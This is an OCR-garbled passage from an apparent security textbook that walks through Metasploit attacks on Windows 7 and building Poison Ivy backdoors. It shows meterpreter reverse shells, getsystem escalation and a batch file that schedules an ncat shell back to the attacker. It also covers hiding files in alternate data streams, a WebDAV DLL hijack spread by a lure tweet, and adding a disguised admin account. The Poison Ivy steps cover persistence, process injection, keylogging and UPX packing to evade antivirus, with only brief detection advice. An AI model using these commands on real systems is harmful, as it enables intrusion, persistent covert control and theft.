Note: In order for the listener to work, msfconsole must be started with root privileges. 


nod WN — 


. msfconsole 

. use multi/handler 

. set lhost 192.168.1.100 
. set lport 53 


msf » use multi/handler 

msf exploit(handler) » set payload windows/meterpreter/reverse tcp 
payload -» windows/meterpreter/reverse tcp 

msf exploit(handler) > set lhost 192.168.1.100 

lhost => 192.168.1.100 

msf exploit(handler) » set lport 53 

lport => 53 

msf exploit(handler) » exploit 


[*] Started reverse handler on 192.168.1.100:53 
[*] Starting the payload handler... 
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The attacker can launch the malicious payload with meterpreter’s execute command in the 
current connected session: 


execute —f hotfix.exe 


meterpreter > execute -f hotfix.exe 
Process 736 created. 


Once the hacker has a second shell connected, they can get higher privileges by typing getsystem. 


Note: getsystem is one of the privileged commands and can be loaded by typing use priv. Type 
the following commands to get your “before and after” identity. 


getuid 
use priv 
getsystem 
[*] Started reverse handler on 192.168.1.100:53 
[*] Starting the payload handler... 
[*] Sending stage (749056 bytes) to 192.168.1.3 
[*] Meterpreter session 2 opened (192.168.1.100:53 -> 192.168.1.3:49158) at 2010-11-11 € 
2:58:53 -0500 
g 


emeterpreter » getuid 
Server username: person-PC\person 


meterpreter » getsystem 
-..got system (via technique 4). 


meterpreter » getuid 
Server username: NT AUTHORITY\SYSTEM 


meterpreter » sysinfo 

Computer: PERSON-PC 

os : Windows 7 (Build 7600, ). 
Arch : x86 

Language: en US 


One the attacker has SYSTEM access, they can exploit the victim machine without restrictions. 
The attacker can create a batch file of commands they want to execute. This can be accomplished 
by typing the following commands from a separate terminal. 


1. touch tasks.txt 
2. gedit tasks.txt 
3. gedit tasks.txt 
a. net user administrator /active:yes 
b. net user administrator P@sswOrd 
c. nmap-5.21-setup.exe /S 
d. at 12:00 “C:\program files\nmap\ncat.exe” -C 192.168.1.100 443 -e cmd.exe 
4. mv tasks.txt tasks. bat 


net user administrator /active:yes 

net user administrator P@sswOrd 

wget http://nmap.org/dist/nmap-5.21-setup.exe 
nmap-5.21-setup.exe /S 

at 12:00 "C:\program files\nmap\ncat.exe" -C 192.168.1.100 443 -e cmd.exe 


File Edit View Terminal Tabs Help 
ubuntu@ubuntu:~$ touch tasks.txt 
ubuntu@ubuntu:~$ gedit tasks.txt 
ubuntu@ubuntu:~$ mv tasks.txt tasks.bat 
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The batch file tasks.bat and nmap-5.21-setup.exe can be uploaded to the victim by typing the fol- 
lowing commands in the meterpreter shell connected to the victim: 


1. upload home/ubuntu/nmap-5.21-setup.exe c:\\users\\Yousername% 
2. upload /home/ubuntu/tasks.bat c:\\users\\Yousername% 


Install the latest version of Nmap on your ubuntu system by typing 
1. sudo apt-get install nmap 

Start an Neat listener on your system on port 443 by typing 
2. sudo ncat -l -p 443 

ubuntu@ubuntu: ~$ sudo ncat -1 -p 443 

Execute the tasks.bat file (hidden) by typing 
3. execute -H -f tasks.bat 


meterpreter » execute -H -f tasks.bat 
Process 3588 created. 


At 12:00, a command prompt should be sent to the attack machine. Once the prompt connects 
to the attacker, the attacker can type whoami to determine their level of privilege. Task Scheduler 
runs at the SYSTEM level, so the level of privilege should be NT AUTHORITY\SYSTEM. Users 
do not normally get SYSTEM level privileges within Microsoft Windows. 


Microsoft Windows [Version 6.1.7600] 
Copyright (c) 2009 Microsoft Corporation. All rights reserved. 


C:\Windows \system32>whoami 
whoami 
nt authority\system 


With a command prompt, the user can check to see if the administrator account was success- 
fully enabled by typing net user administrator and viewing the results of the output. 


C:\Windows\system32>net user administrator 
net user administrator 


User name Administrator 

Full Name 

Comment Built-in account for administering the computer/domain 
User's comment 

Country code 000 (System Default) 

Account active Yes «4—————————— 


The hacker may not be the only one who notices that the administrator account is enabled. 
The person using the victim machine might notice that there is another logon account enabled. 
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person 


i». Windows 7 Professional 


It would be a good idea to hide the tasks.bat file so it is not detected by the user. The attacker 
can do this by using an alternate data stream (ADS). The ADS feature was added to the new 
technology file system (NTFS) for compatibility with older versions of Mac OSs. This “feature” of 
the file system will allow users to hide their data using the type command and a redirect. The dir 
Ir command will display all ADSs in Windows Vista, Windows 7, and Server 2008. To hide the 
tasks.bat file using an ADS, navigate to the directory of tasks.bat and type 


1. mkdir Games 

2. type tasks.bat » Games:tasks.bat 
3. del tasks.bat 

4 dir /r 


c:\Users\person>mkdir Games 
mkdir Games 


c:\Users\person>type tasks.bat > Games:tasks.bat 
type tasks.bat » Games:tasks.bat 


c:\Users\person>del tasks.bat 
del tasks.bat 


c:\Users\person>dir /r 

dir /r 

Volume in drive C has no label. 
Volume Serial Number is FC86-6D8C 


Directory of c:\Users\person 
11/13/2010 06:58 PM <DIR> 


11/13/2010 06:58 PM <DIR> ee 
11/08/2010 07:16 PM <DIR> Contacts 


11/13/2016 12:26 PM <DIR> Desktop 
11/08/2010 07:16 PM <DIR> Documents 
11/08/2010 07:16 PM <DIR> Downloads 
11/08/2010 07:17 PM <DIR> Favorites 
11/13/2010 06:57 PM <DIR> Games 


yp 143 Games: tasks.bat:$DATA 
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Another technique a hacker can use for data hiding is changing the extension. Most forensic tools 
like EnCase, FTK, and X-ways will detect both ADS and file extension changing. The forensic 
tools use the file signatures to detect the true type of the file. Gary Kessler has a website that lists 
most file signatures: garykessler.net/library/file_sigs.html. In this case the attacker will rename the 
Nmap file to readme.txt so a user will be less likely to detect it. To hide the tasks.bat file using an 
ADS, navigate to the directory of Nmap and type 


1. ren nmap-5.21-setup.exe readme.txt 
2. dir 


c:\Users\person>ren nmap-5.21-setup.exe readme.txt 
ren nmap-5.21-setup.exe readme.txt 


c:\Users\person>dir 

dir 

Volume in drive C has no label. 
Volume Serial Number is FC86-6D8C 


Directory of c:\Users\person 


11/13/2010 08:14 PM «DIR» 

11/13/2010 68:14 PM «DIR» oe 
11/08/2010 67:16 PM «DIR» Contacts 
11/13/2010 68:13 PM «DIR» Desktop 
11/08/2010 07:16 PM «DIR» Documents 
11/08/2010 67:16 PM «DIR» Downloads 
11/08/2010 67:17 PM «DIR» Favorites 
11/13/2010 66:57 PM <DIR> Games 
11/08/2010 07:17 PM <DIR> Links 
11/08/2010 67:16 PM «DIR» Music 
11/08/2010 67:16 PM <DIR> Pictures 
11/13/2010 07:01 PM «DIR» RadioStations 
11/12/2010 68:26 PM 15,623,433 readme.txt 


Even though it has a bad extension, the Nmap file can run if the user types readme.txt /S. 


C:\Users\person>readme.txt /S 
readme.txt /S 


A hex editor, like HxD, can be used to open the readme.txt file and verify that it is an .exe even 
through it has a file signature of MZ. 


Offset (h) 
00000000 


00000010 
00000020 


00000030 . . 
00000040 sses * £1, .Lf!Th 
00000050 is program canno 
00000060 t be run in DOS 
00000070 
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Metasploit does not have to be used from a Linux or Mac OS X environment. The Metasploit 
framework also runs well on Microsoft Windows platforms. Start by downloading Metasploit 
from the website www.metasploit.com. It may work out better for you if you install it on a VM. In 
order to get the program to work properly, use it on a machine without any antivirus or software 
firewall. You need a software firewall and antivirus on your system in today’s world, but those 
items may corrupt a Metasploit installation. You can use XP, 2003, Vista, or Windows 7 as your 
attack platform. If you prefer Linux, you can also download the preconfigured BackTrack 4 R1 
VM from the download area on the www.backtrack-linux.org website. 


This product is not compatible with common anti-virus solutions. Before continuing, please disable any installed 
anti-virus software or add an exclusion for the Metasploit installation directory. Failure to do so can lead to a corrupt 


installation and the malfunctioning of certain exploit modules. 


Ca 


Before you start Metasploit, always make sure you have the most recent version. The product 
is updated frequently and it is essential to update it in order to get the latest exploits. In order 
to make sure Metasploit is up to date, select Metasploit Update from the Metasploit Framework 
menu. After the updates have finished loading, hit Enter to exit from the update screen. When 
you launch Metasploit, the banner will indicate how many days have elapsed since your last 
update. 


All Programs 5 @ Mozilla Firefox > 


Follow these directions to install Metasploit on a Windows attack machine: 


1. Download the latest version of Metasploit from Metasploit.com. 

2. Double click on the .exe file and select OK to the AV and firewall warnings. 
3. Click Next at the Setup screen. 

4, Read the agreement over and click Accept if you accept the agreement. 

5. Click Next for the folder location and Next at the Ready to Install screen. 
6. Click Finish after Metasploit has been installed successfully on your system. 


To start msfconsole on your Microsoft Windows machine, 


1. Open System Console from the Metasploit Framework menu bar. 
2. From the Console menu bar, select File, choose New Tab, and select Metasploit. 


Metasploit 


| Fle Edt View Help 
|5-es*|(uecose 
(B Ha Metasploit | abx 


< metasploit > 


=[ metasploit v3.5.1-dev [core:3.5 api:i.0] 


+ -- --=[ 616 exploits - 306 auxiliary 
+ -= -=-= [ 215 payloads - 27 encoders - 8 nops 
=[ svn r10845 updated today (2010.10.29) 
wer 
[Ready 16x79 


WebDAV DLL Hijacker 
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The WebDAV applcation DLL Hijacker is a formidable attack that works against systems when 
they launch a file that exists on a remote website. That file can be a Word, Powerpoint, or Excel 
file. Older (PPT, XLS, DOC) and newer (PPTX, XLSX, DOCX) Office formats are supported. 


To search for this exploit within Metasploit, type search hijack. 


Exploits 


Name Disclosure Date Rank Description 


b mi abbix D 


mst s 


To find out more information about this exploit, type the following command: 
1. info windows/browser/webdav dll hijacker 


msf > info vindows/browser/webdav dll hijacker 


Name: WebDAV Application DLL Hijacker 
Version: 10454 
Platform: Windows 
Privileged: No 
License: Metasploit Framevork License (BSD) 
Rank: Manual 


Provided by: 
ham <hdm@metasploit.com> 
jduck <jduck@metasploit.com> 
jeran <jcran@metasploit.com> 


Available targets: 
Id Name 


o Automatic 


Basic options: 


Name Current Setting Required Description 

BASENAME policy yes The base name for the listed files. 
EXTENSIONS txt yes The list of extensions to generate 
SHARENAME documents yes The name of the top-level share. 

SRVHOST 0.0.0.0 yes The local host to listen on. 

SRVPORT 80 yes The daemon port to listen on (do not change) 
URIPATH / yes The URI to use (do not change). 


Payload information: 
Space: 2048 


Description: 
This module presents a directory of file extensions that can lead to 
code execution vhen opened from the share. The default EXTENSIONS 
option must be configured to specify a vulnerable application type. 


References: 
http://blog.zoller.1u/2010/08/cve-2010-xn-loadlibrarygetprocaddress.html 
http://wwv.acrossecurity.com/aspr/ASPR-2010-08-18-1-PUB.txt 


windows/browser/webday dll hijacker 2010-08-18 manual WebDAV Application DLL Hijacker 
vindows/mssql/ms09 004 sp replwritetovarbin 2008-12-09 good Microsoft SQL Server sp replurit 
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To use this exploit, type the following command: 
2. use windows/browser/webdav dll hijacker 


Some of the options that can be set for this exploit include 


B Dasename 
W Extensions 
B Sharename 


m SRVHOST 


Note: The options SRVPORT and URIPATH are not to be changed. To set an option within the 
exploit submenu, type the following commands: 


3. set basename documents 

Á. set extensions doc docx 

5. set sharename hacking 

6. set SRVHOST 192.168.1.100 
7. show options 


msf exploit(webdav dll hijacker) > set basename documents 
basename => documents 

msf exploit(webdav dll hijacker) > set extensions doc docx 
extensions => doc docx 

mst exploit(webdav dll hijacker) > set sharename hacking 
sharename => hacking 

msf exploit (webdav_dll hijacker) > set SRVHOST 192.168.1.100 
SRVHOST => 192.168.1.100 

msf exploit (webdav dll hijacker) > show options 


Module options: 


Name Current Setting Required Description 


BASENAME documents The base name for the listed file 
e t 


EXTENSIONS doc docx The list of extensions to genera 

SHARENAME hacking The name of the top-level share. 

SRVHOST 192.168.1.100 The local host to listen on. 

SRVPORT 80 The daemon port to listen on (do not change) 
URIPATH The URI to use (do not change). 


After setting the exploit options, a payload must be selected and its options must be set: 


8. set payload windows/meterpreter/reverse tcp 
9. set lhost 192.168.1.100 
10. exploit 
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msf exploit(webdav dll hijacker) > set payload windows/meterpreter/reverse tcp 
payload => vindows/meterpreter/reverse tcp 

mst exploit (webdav dll hijacker) > set lhost 192.168.1.100 

lhost => 192.168.1.100 

ms exploit (webdav_dll hijacker) > exploit 

[*] Exploit running as background job. 

mst exploit (webdav dll hijacker) > 

[*] Started reverse handler on 192.168.1.100:4444 

+ 

[*] Exploit links are now available at \\192.168.1.100\ hacking\ 
a 

] Using URL: http://192.168.1.100:80/ 
*] Server started. 


= 


Now there has to be a way to get the victims to launch the malicious payload. But how? 


jessevarsalone jesse varsalone 
Hey all my followers, check out this awesome document on hacking. 
http://bit.ly/b3pWk6 


ow 


Wow, that looks like a cool tweet. I think I will click on it because this guy tweets good stuff. 


{É http://192.168.1.100/ - Windows Intemet Explorer 


(CON [E http://192.1681.100, EEIESESIPEET 


(CJGC)- [E » Network » 1921681100 » hacking ~ [+4] [ Search hacking 


Organize ¥ New folder 


X Favorites Name Date modified Type 


Bil Desktop IE) documents.doc 11/14/2010 4:56 PM — Microsoft Office 
Jj. Downloads G) documents.docx 11/14/20104:56 PM — Microsoft Office 
F Recent Places 


G Libraries 
E Documents 
a) Music 
E Pictures 
B Videos 

wy Homegroup 


A Computer 


ig Network 


2 items Offline status: Online 
- d Offline availability: Not available 


, 10:54 PM 
11/14/2010 


When the document is opened the meterpreter session is connected and the victim is now 
owned. 


286 m Defense against the Black Arts 


[*] 192.168.1.80:1044 PROPFIND => 207 Directory (/hacking/foo/) 
[°] 192.168.1.60:1044 PROPFIND => 207 Top-Level Directory 
[*] 192.168.1.80:1044 PROPFIND /hacking/System32/System32/vmhgfs.d1ll 
[*] 192.168.1.80:1044 PROPFIND => 207 File (/hacking/System32/System32/vmhgfs.dll 
[*] 192.168.1.80:1044 GET => DLL Payload 
[*] 192.168.1.80:1044 PROPFIND /hacking/rundll32.exe 
1 


[*] 192.168.1.80:1044 PROPFIND => 404 (/hacking/rundll32.exe) 

[*] Sending stage (749056 bytes) to 192.168.1.80 

[*] 192.168.1.80:1044 PROPFIND /hacking 

[*] 192.168.1.80:1044 PROPFIND => 301 (/hacking 

[*] 192.168.1.80:1044 PROPFIND /hacking/ 

[*] 192.168.1.80:1044 PROPFIND => 207 Directory (/hacking/ 

[*] 192.168.1.80:1044 PROPFIND => 207 Top-Level Directory 

[*] Meterpreter session 1 opened (192.168.1.100:4444 -» 192.168.1.80:1048) at 2010-11-14 22:04:24 -0500 


To view and interact with the connected sessions, type the following commands: 


1. sessions -1 
2. session —i 1 
3. sysinfo 


mst exploit(webdav dll hijacker) > sessions -1 


Active sessions 


Id Type Information Connection 


1 meterpreter x86/win32 person-PC\person 8 PERSON-PC 192.168.1.100:4444 -> 192.168.1.80:1048 


mst exploit(webdav dll hijacker) > sessions -i 1 
[*] Starting interaction with 1... 


meterpreter » sysinfo 

Computer: PERSON-PC 

os : Windows 7 (Build 7600, }. 
Arch : x86 

Lanquaqe: en US 


It is always good to elevate your privileges if possible. To do this, type the following: 


4. use priv 
5. getsystem 


meterpreter » getsystem 


[*] 192.168.1.80:1051 PROPFIND /hacking/tuunk 16.pif 

[*] 192.168.1.80:1051 PROPFIND -» 207 File (/hacking/twunk 16.pif) 
[*] 192.168.1.80:1051 PROPFIND /hacking 

[*] 192.168.1.80:1051 PROPFIND => 301 (/hacking) 

[*] 192.168.1.80:1051 PROPFIND /hacking/ 

[*] 192.168.1.80:1051 PROPFIND => 207 Directory (/hacking/) 

[*] 192.168.1.80:1051 PROPFIND => 207 Top-Level Directory 

[*] 192.168.1.80:1051 PROPFIND /hacking/ntvdm.exe 

[*] 192.168.1.80:1051 PROPFIND -» 404 (/hacking/ntvdm.exe) 

...GQot system (via technique 4). 


The hacker can start a hidden command prompt so they do not alert the victim that they are on 
the user's system. To start a command prompt as a hidden process, type the following command: 
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6. execute -H -f cmd.exe -i 


meterpreter > execute -H -f cmd.exe -i 
Process 3328 created. 
Channel 1 created. 


[*] 192.168.1.80:1052 PROPFIND /hacking 

[*] 192.168.1.80:1052 PROPFIND => 301 (/hacking) 

[7] 192.168.1.80:1052 PROPFIND /hacking/ 

[*] 192.168.1.80:1052 PROPFIND -» 207 Directory (/hacking/) 
[*] 192.168.1.80:1052 PROPFIND => 207 Top-Level Directory 


[*] 192.168.1.80:1052 PROPFIND /hacking 

[*] 192.168.1.80:1052 PROPFIND => 301 (/hacking) 

[*] 192.168.1.80:1052 PROPFIND /hacking/ 

[*] 192.168.1.80:1052 PROPFIND => 207 Directory (/hacking/) 
[*] 192.168.1.80:1052 PROPFIND => 207 Top-Level Directory 


[*] 192.168.1.80:1052 PROPFIND /hacking/cmd.exe 
[*] 192.168.1.80:1052 PROPFIND => 404 (/hacking/cmd.exe) 


'3192.168.1.100S hacking' 

CMD.EXE was started with the above path as the current directory. 
UNC paths are not supported. Defaulting to Windows directory. 
Microsoft Windows [Version 6.1.7600] 

Copyright (c) 2009 Microsoft Corporation. All rights reserved. 


C:XWindous- 


The attacker can then dominate the system by engaging in account, file, and service manipulation. 


C:\Windows>net user "SYSTEM " PBsswOrd /add 
net user "SYSTEM " P@sswOrd /addà 
The command completed successfully. 


C:\Windows>net stop "Windows Update" 

net stop "Windows Update” 

The Windows Update service is stopping. 

The Windows Update service was stopped successfully. 


Summary 


Metasploit is a powerful framework that allows penetration testers, security professionals, and 
hackers to attack weaknesses in systems that are unpatched or have poorly implemented security 
measures. The following measures can help to protect resources within a company: 


Keeping OSs patched. 

Keeping antivirus definitions up to date. 
Updating application software. 

Updating browsers. 

User education. 

Don' open attachments from unknown entities. 
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Several lessons should be learned from this chapter, including 


B Antivirus does not offer 100% protection. 

Em Patched systems can still be vulnerable. 

B Once an attacker gains control of a system, security measures may become unreliable. 
B Artifacts will often be left behind by the attacker. 


As you become more familiar with Metasploit, you can better understand computer security and 
have a real idea of how attackers can use a tool like this to exploit a system. Tools like this allow 
less-sophisticated attackers to carry out highly sophisticated attacks. 


Chapter 11 
Other Attack Tools 


Overview 


In this chapter we go over the process of using other attack tools in the penetration of the network. 
Generally, these tools can be used to backdoor into the network after a hacker has exploited into 
a network. One of the hard jobs for the hacker is maintaining an undetectable presence in the 
network. Hackers use what are called command and control tools to control victims and infiltrate 
and to create a significant presence throughout the network while trying to remain undetectable 
and subvert detection. These command and control tools allow full command and control of the 
server, which can range from different features such as stealing files, keylogging, and dumping 
passwords, to even screen capturing. 

One of the primary ways to detect command and control tools is to detect the tools running 
on the computer itself. This involves dumping the running processes and looking for associated 
process identifiers (PIDs) that could be running malware and are beaconing to unknown domain 
name system (DNS) or Internet protocol (IP) addresses. There are a few investigative tools that are 
used to help detect command and control programs on a possible victim. 


Note: First run antivirus! This is one of the most important tools and will look for the signatures 
of the command and control executable resident on the hard drive. 


Sysinternals 


The sysinternals (http://technet.microsoft.com/en-us/sysinternals/) suite is a compilation of sys- 
tem administration utilities that contains troubleshooting tools; however, these tools can also be 
geared to performing forensics investigation, such as determining running processes associated 
with malware and beacons to unknown IP addresses and ports. 


Pslist 


Pslist shows the running processes and the associated PID. This is good for detecting rogue PIDs 
such as command and control tools. The elapsed time shows how long the service is running, 
which helps the investigator to see what PIDs are not part of the normal startup process. 
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information for UICTIM 


Pid Pri Thd 

6 a8 1 
8 
1 


0:00: 


- 808 
. 046 


Tasklist/m 


Tasklist is a program included with Windows that allows you to command line list out the running 
tasks on the computer and associated dynamic link libraries (DLLs). This is especially important 
for detecting malware and the malicious DLLs involved. The /m shows you the associated DLLs. 


Netstat —ano 


Netstat is a command line tool that is included within Windows to give you network statistics. 
However, with the right switches this simple tool will allow you to detect active command and 
control malware beacons. Adding the —a displays all TCP and UDP connections, along with —n, 
which suppresses name resolution to identify IP addresses; lastly —o corresponds to the associated 
PID beaconing to that IP address. This is absolutely helpful in detecting what is responsible for 
beaconing and figuring out what process/executable is attributed to that. Here is an example of 


netstat —ano output. 


TCP 


192.168.1.34:1495 10.9.2.3:80 ESTABLISHED 


3560 


After we have run a netstat we see that our host 192.168.1.34 


via PID 3560. 


ev Select C WINDOWS: system32' cmd.exe 


-800 
T 


UMUpgradeHe lper 
d llhost 


sh 1 

Poison Ivy 2.3.2 

proce 

iumipr J 2856 
PsList 3000 


is beaconing on port 80 to 10.9.2.3 
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Therefore, we would then want to run a pslist to determine the associated PID. As we can see 
from running a pslist it comes up as IEXPLORE. This may be because the malicious executable 
injected itself into an existing running process of Internet Explorer or may have created its own 
PID to trick the user to think that program is just open. Once we have identified the PID it is then 
helpful to open up Process Explorer to explore the process tree and find associated DLLs that may 
be functioning with this malware. 


Process Explorer 


This tool, as part of the sysinternals suite of tools, shows the various active processes and the 
executable names, and what they are dependent on. One of the other good things about this tool 
is that in DLL mode you can see how those processes are linked. This is a great tool for detecting 
malicious DLLs or executables or DLLs that are injected into other processes. However, good 
hackers inject into existing executables running on the system, so careful examination of the run- 
ning processes/PIDs is required to detect various malware. 


$3 Process Explorer - Sysinternals: www.sysinternals.com [BOOYA\Administrator] 


File Options View Process Find DLL Users Help 
|gd| 3 sO OS\ ex ae 


Tenable Network Security... 
478,040 K 123,928 K Tenable Network Security... 
6.140 K 2,424 K VMware Tools Core Service VMware, Inc. 
836 K 400 K VMware virtual hardware up... VMware, Inc. 
2.152 K 1,872 K COM Surrogate Microsoft Corporation 
17,908 K 8,832 K LSA Shell Microsoft Corporation 
6716K 13,140 K Windows Explorer Microsoft Corporation 
VMwareTray.exe 2156K 5,220 K VMware Tools tray application VMware, Inc. 
VMwareUser.exe 7,832 K VMware Tools Service VMware, Inc. 


52 K Windows Cammand Processor Microsoft Camnration 


Advanced Windows 32 Base API Microsoft Corporation 

ATL Module for Windows XP (Unic... Microsoft Corporation 

AVI Capture window class Microsoft Corporation 

User Experience Controls Library Microsoft Corporation . . 
Common Controls Library Microsoft Corporation §.82.3790.0 
Crypto API32 Microsoft Corporation 5.131.3790.0 


GDI Client DLL Microsoft Corporation 5.2.3790.0 
Internet Explorer Microsoft Corporation 
IP Helper API Microsoft Corporation 
Windows NT BASE API Clent DLL Microsoft Corporation 


Microsoft MIDI Mapper Microsoft Corporation 
mone cf Multinke Provider Router D Microsoft Comoration g 
[CPU Usage: 10.61% (Commit Charge: 69.83% Processes; 39 Physical Usage: 74.80% | A 


Remote Administration Tools 


Remote administration tools (RATS), such as Poison Ivy and Shark, are used by the hacker to com- 
mand and control his victim. These tools consist of a graphical user interface (GUI) to manage 
multiple compromised victims, and the ability to generate a malicious executable that will beacon 
to a host. This victim runs the command and control software and then wherever that beacons to 
has full control over the server. However, this is reliant on the attacker getting this executable on 
the victim’s system or having the user execute it somehow. 
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Poison Ivy RAT 


Poison Ivy is a free remote administration tool that allows hackers to command and control 
Windows operating systems. Poison Ivy allows a hacker to create a small executable of roughly 
7 KB, which acts as a server to command and control a system. The server's small size and how the 
executable is coded alone makes it more difficult to detect. The Poison Ivy tool itself allows you to 
interact with the server and control the victim. One of the big benefits of this tool is that all that is 
required is the small executable itself. It's important to note that these tools typically communicate 
over encrypted channels, therefore, it’s not easy to determine what is going on over the network 
when running a packet capture as the displayed text is unreadable. Poison Ivy communicates using 
256-bit Camellia encryption and compression. Poison Ivy has a lot of extensive features useful to a 
hacker, such as file management, registry editing, listing processes/services, installing/uninstalling 
applications, remote shells, stealing password hashes, and even keylogging. 


"eoo Poison Ivy - Remote Administration Tool 
aje] ME http:/ /www.poisonivy-rat.com/ 


q] p | 


Home - Downloads - Screenshots - Development - Customer Portal ~ Links - Contact 


Site/downloads up again 
2008-11-20 


1 have received a tremendous amount of emails from people wanting me to continue the project even though it might take 
some time until the next release. 

It's meant alot to me to see this kind of support for the project. That's why I've decided to bring back the site, but I will not 
promise anything... 

1 hope to get some time and motivation to finish the new version. 


Development 
2008-03-30 
The next version is well on its way (even though I havent updated the dev.log in ages). 1 decided to redo most of the core 
code in the client and also implement language support. The new dient will use less memory and be somewhat faster. The 
language file (english) will be uploaded, once the new version is done, for anyone to transiate. 


Stay tuned for more info. 


New plugin: Optix Screen Capture 
2006-02-04 
The former EES founder, th3 s13az3, has contributed with an excellent screen capture plugin. 
Hence the name it has the same style as Optix Pro (which th3 sl3az3 was the author of). Source codes are included (which 
requires a couple of Delphi Components, they are included as well). 


Download it heret 


Accepting Poison Ivy Connections 


Before the Poison Ivy server has been executed on the victim we now have to create a server to 
accept connections. Open the Poison Ivy console on the host that it’s beaconing to and go to 
File > New Server. This will then start a new client that can start listening for Poison Ivy beacons. 
Notice that you have to designate what port the command and control server should listen on 
and the password. Once a server starts beaconing to this address and port, it double clicks on the 
server to interact with it. It’s also important that a port is used that is able to be routed through 
the firewall. 
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lolx) 
mi| File Preferences Window Help -lal x) 


Listen on Port: [443 E 
[ Promot for password on new connection 


Password [amid [^ Hide Password 


I~ Use Key File 


Load Key 


coed | 


Version 2.3.2 Nr. of Ports: 0 Nr. of Plugins: 0 NN. of Connections: 0 A 


Building Poison Ivy Backdoors 


Poison Ivy is used as a backdoor tool to further infiltrate the network; in order to use this tool the 
hacker has to generate an executable and then deploy it on the victim. This is typically after some 
type of administrator access has been exploited via a buffer overflow or even a spearfish attack. Go 
to File > New. Poison Ivy will then prompt you to create a profile. This will designate a profile for 
this scheme of malware that the hacker intends to create so he can come back to this later. 


Poison Ivy 4 -ini [m] xl 


Profiles 
Ld 
Profiles 


Create Profile 


Profile Name: 


Connection 


Install 


Advanced 


Build 


© Cancel 


Version 2.3.2 Nr. of Ports: 1 Iw. of Plugins: O Nr. of Connections: 0 4 


Preparing Beaconing Malware 


Next, Poison Ivy will prompt you for the connection to which this malware will beacon. Notice 
also in the upper right-hand corner the various options selected and added can increase the size 
of the malware. Remember that Poison Ivy will use a reverse connection, meaning it is going to 
beacon out to where you're going to designate. This program will mot attack a host. Therefore, you 
have to specify either an IP address or DNS address and a port to connect to. In this option, the 
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malware is going to beacon to 10.9.2.3 on port 443. This is designated 10.9.2.3:443:0. However, 
the hacker has the ability to add as many connections as he needs. This would be helpful if the 
command and control server were to get compromised or other beaconing locations are discovered 
and blocked or blacklisted. Notice that this tool also gives you the ability to connect through a 
proxy to mask or forward through a connection. Also notice it has the ability to hijack a proxy, so 
if a victim doesn't have direct access to the internet it can use Internet Explorer's existing proxy 
settings to get out to the Internet and beacon correctly. 


ii x) 
Connection [admin] Size: 6.21 KiB 
P 
Profies DNS/Pot: [108234430 Add 
z [^ Connect Through Proxy 
rd DNat| —— m 
Connection 
[ HiackPro O 
[^ Persistent (keep trying until found) 
Install ID: [am ———— 
Group: i:  — —— 1 
E Password [admin [- Hide Password 
[ Use Key File 
Load Key Generate Key 
Build 
© Cancel Nest => 
Version 2.3.2 Nr. of Ports: 1 Nr. of Pluains:0 — Nr. of Connections: O 7 


Lastly, Poison Ivy has the ability to designate IDs and passwords (which can also use a randomly 
generated keyfile). This is so other hackers don't command and control this server and the hacker 
can identify the malware strain that compromised the system. Once this is finished click Next. 


Preparing Install of Malware 


This section chooses how the malware will be started and copied on the victim's system. One of 
the attacker's goals is to make sure he has retained access if his connection drops for some rea- 
son. So in most intrusion investigations malware automatically starts. Clicking Start on System 
Startup allows designating keys in the registry in which Poison Ivy starts. It also allows Poison 
Ivy to copy itself into another directory, whether it is the System or Windows directory, or within 
an alternate data stream (ADS). Then, lastly, Melt tells the existing executable that was started 
to delete itself after installing. Note that there always has to be a single executable running and 
installed for it to beacon to the command and control server. In most forensics investigations, 
investigators are looking for command and control malware. This key will automatically start 
Poison Ivy whenever a user logs into the system: HKEY_LOCAL_MACHINE\SOFTWARE\ 
Microsoft\Windows\CurrentVersion\Run. 
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dows\CurrentVersion\Run 


ICE2FAA215206F81-2 = 


Advanced Poison Ivy Options 


Poison Ivy also has even more advanced features to evade detection. The process Mutex prevents 
multiple copies of an application from running; therefore, if you need to further backdoor and 
run multiple servers of Poison Ivy, make sure that you change the Mutex. Poison Ivy also gives you 
the ability to inject into current processes; the Persistence option will allow the process to restart 
hacker is going to want to designate a process to inject too that is pertinent to the system such 
as svchost.exe. The keylogger functionality is also available, which will record all actions typed. 
Finally, the format allows generating either shellcode, to be modified to prevent detection, or a 
portable executable (PE) itself. Go ahead and click Next. 


Poison Ivy 


Advanced [admin] 
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Generating a PE 


Once all the options have been selected, click Generate to create the PE that can be executed on 
the victim. Notice in the upper right-hand corner all the options selected created a 9.39 KB file. 
Also notice that you can even add an icon within Poison Ivy to make it more legitimate looking. 
Lastly, it can also use third-party applications such as UPX. UPX is a packer that allows the com- 
pression of a portable executable that decreases its size and changes its composition. This makes it 
a little harder to detect via antivirus because its signature has changed. 


Poison Ivy 


Build [admin] Size: 9.39 


© Cancel A Generate OK = 


Version 2.3.2 (Nr. of Ports:1 (Nr. of Phugins:0 (Nr. of Connections:0 — 2 


Now that the executable has been created, the hacker will take it, transport this file to the 
victim, and execute it. Once this file is executed it will then start beaconing to Poison Ivy itself 
and will be detected and show in the browser of the GUI. If it doesn’t, likely the connection 
between the victim and the command and control server is being blocked and a quick port 
change is probably needed either because it’s blocked or that port is already being used by the 


server. 


Commanding and Controlling Victims with Poison Ivy 


Now that the server has been deployed on the victim and starts beaconing to the command and 
control host, it will appear within Poison Ivy itself. In order to interact with the victim, double 
click on the server. If for some reason the host appears red, right click and restart as it needs to be 
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updated. Notice this gives detailed characteristics about the server such as the ID, wide area net- 
work (WAN), and local area network (LAN) addresses, computer name, and even the user. This 
is helpful for identifying what server has been compromised. 


Poison Ivy - [Listening on Port: 443 (Connections: 1)] 3 -lni xi 
=18 xl 


mi| File Preferences Window Help 
Connections | Statistics | Settings | 


ij admin 10.923 10923 Direct VICTIM Administrator Admin Server2003 2653 MHz 38349MiB 231 31 


Version2.3.2 |Nr. of Ports:1 |r. of Plugins: — Nr. of Connections: 1 y 


Statistics 


The Statistics tab keeps all data about all beacon attempts to the command and control server. It 
also tells you how much data is being sent over the network and the compression ratio of the data. 
This is useful for minimizing data bandwidth use to prevent detection. 


Poison Ivy - [Listening on Port: 443 (Connections: 1)] „joj xj 
18) x| 


m Fle Preferences Window Help 
Connections Statistics | Settings | 
Total successful connections; 2 Connection Log: 
S METER Esp 
Compressed: 11.19 Ki. 


Uncompressed: 17.29 KiB. 
Ratio: 55 % 


Received 
Compressed: 637 B 
Uncompressed: 679 B 
Ratio: 7.00000000000001 % 


Version 2.3.2 Nr. of Ports: 1 |Nr. of Plugins: 0 — Nr. of Connections: 1 7 


Command and Control 


As you can see, Poison Ivy has a lot of flexibility for commanding and controlling a server. 
